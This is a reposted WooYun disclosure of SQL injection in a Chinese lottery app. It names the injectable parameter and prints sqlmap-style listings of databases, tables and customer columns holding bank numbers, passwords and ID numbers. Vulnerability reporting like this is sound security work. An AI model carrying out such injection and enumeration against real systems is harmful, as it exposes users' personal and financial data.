神刀安全网

漏洞標題: APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行)(大陆地区)

漏洞詳情

披露狀態:

2016-04-30: 細節已通知廠商並且等待廠商處理中
2016-05-05: 廠商已經確認,細節僅向廠商公開
2016-05-15: 細節向核心白帽駭客及相關領域專家公開
2016-05-25: 細節向普通白帽駭客公開
2016-06-04: 細節向實習白帽駭客公開
2016-06-19: 細節向公眾公開

大概描述:

我也来一发 不知道重复没~

詳細說明:

code 区域
http://**.**.**.**/news/newslist.php?categoryId=15

漏洞標題:  APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行)(大陆地区)

code 区域
available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tubiao


Database: caiso
[86 tables]
+------------------------------+
| account |
| accountlog |
| activity_activities |
| activity_activity_detail |
| admin_channel |
| admin_class |
| admin_permissions |
| admin_role |
| admin_role_function |
| admin_sendsomething_template |
| admin_syslogs |
| admin_user |
| admin_winprize |
| agent |
| bankcardInfo |
| business_activity_partner |
| business_article |
| business_article_category |
| business_article_inlink |
| business_article_partner |
| business_back_money_request |
| business_chase |
| business_chaseitem |
| business_city_no |
| business_community |
| business_company |
| business_cps_day_report |
| business_customer |
| business_customer_commission |
| business_email |
| business_email_log |
| business_feedback |
| business_filedownlod |
| business_friendly_link |
| business_league |
| business_league_rank |
| business_match_arrange |
| business_match_history |
| business_match_mapping |
| business_match_team_mapping |
| business_mobile |
| business_odd |
| business_order |
| business_order_queue |
| business_order_temp |
| business_part |
| business_partner |
| business_pay |
| business_pay_out_request |
| business_payment_request |
| business_plan |
| business_plan_item |
| business_print_term |
| business_prize_level |
| business_recharge_gift |
| business_restricted |
| business_sms_log |
| business_sms_mo_log |
| business_sms_partner |
| business_soft_update |
| business_spread_channel |
| business_supplier |
| business_sys_account |
| business_sys_account_log |
| business_system_param |
| business_team |
| business_term |
| business_term_type_config |
| business_ticket |
| business_wallet |
| business_wallet_log |
| business_win_describe_order |
| business_win_describe_ticket |
| business_win_prize |
| business_you_hui_ma |
| member |
| memberinfo |
| memberlog |
| membershare |
| mibaoinfo |
| odds |
| point |
| pointlog |
| sequence |
| sessions |
| sm_queue |
+------------------------------+

漏洞標題:  APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行)(大陆地区)

code 区域
Database: caiso
Table: business_customer
[52 columns]
+--------------------+---------------+
| Column | Type |
+--------------------+---------------+
| admin_user_id | bigint(20) |
| all_win_money | decimal(19,2) |
| ask | varchar(255) |
| bank | int(11) |
| bank_name | varchar(255) |
| bank_number | varchar(255) |
| bound | varchar(255) |
| channel_id | bigint(20) |
| city | varchar(255) |
| commission_id | bigint(20) |
| credent_no | varchar(255) |
| credent_type | int(11) |
| customer_ip | varchar(255) |
| customer_type | int(11) |
| email | varchar(255) |
| email_accept | varchar(255) |
| id | bigint(20) |
| is_apply | bit(1) |
| is_pass | int(11) |
| last_login_time | datetime |
| login_num | int(11) |
| mobile_no | varchar(255) |
| nick_name | varchar(255) |
| old | int(11) |
| open_id | varchar(255) |
| password | varchar(255) |
| ploy_accur | bigint(20) |
| ploy_consumed | bigint(20) |
| province | varchar(255) |
| question | varchar(255) |
| real_name | varchar(255) |
| reg_channel | int(11) |
| reg_source | int(11) |
| register_time | datetime |
| remarks | varchar(255) |
| sms_accept | varchar(255) |
| sssuper_commission | decimal(19,2) |
| sssuper_ratio | decimal(19,2) |
| sssuperior | bigint(20) |
| ssuper_commission | decimal(19,2) |
| ssuper_ratio | decimal(19,2) |
| ssuperior_id | bigint(20) |
| status | int(11) |
| subbranch | varchar(255) |
| super_commission | decimal(19,2) |
| super_ratio | decimal(19,2) |
| superior_id | bigint(20) |
| user3_id | varchar(255) |
| usr_type | int(11) |
| wake_up_email_num | int(11) |
| wallet_id | bigint(20) |
| yanzhenma | varchar(255) |
+--------------------+---------------+

时间问题 不继续深入了~

漏洞驗證:

修復方案:

版權聲明:轉載請註明來源 Exploit DB@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: APP安全之一彩票存在SQL注入(220W+用户信息泄露/姓名/城市/银行)(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址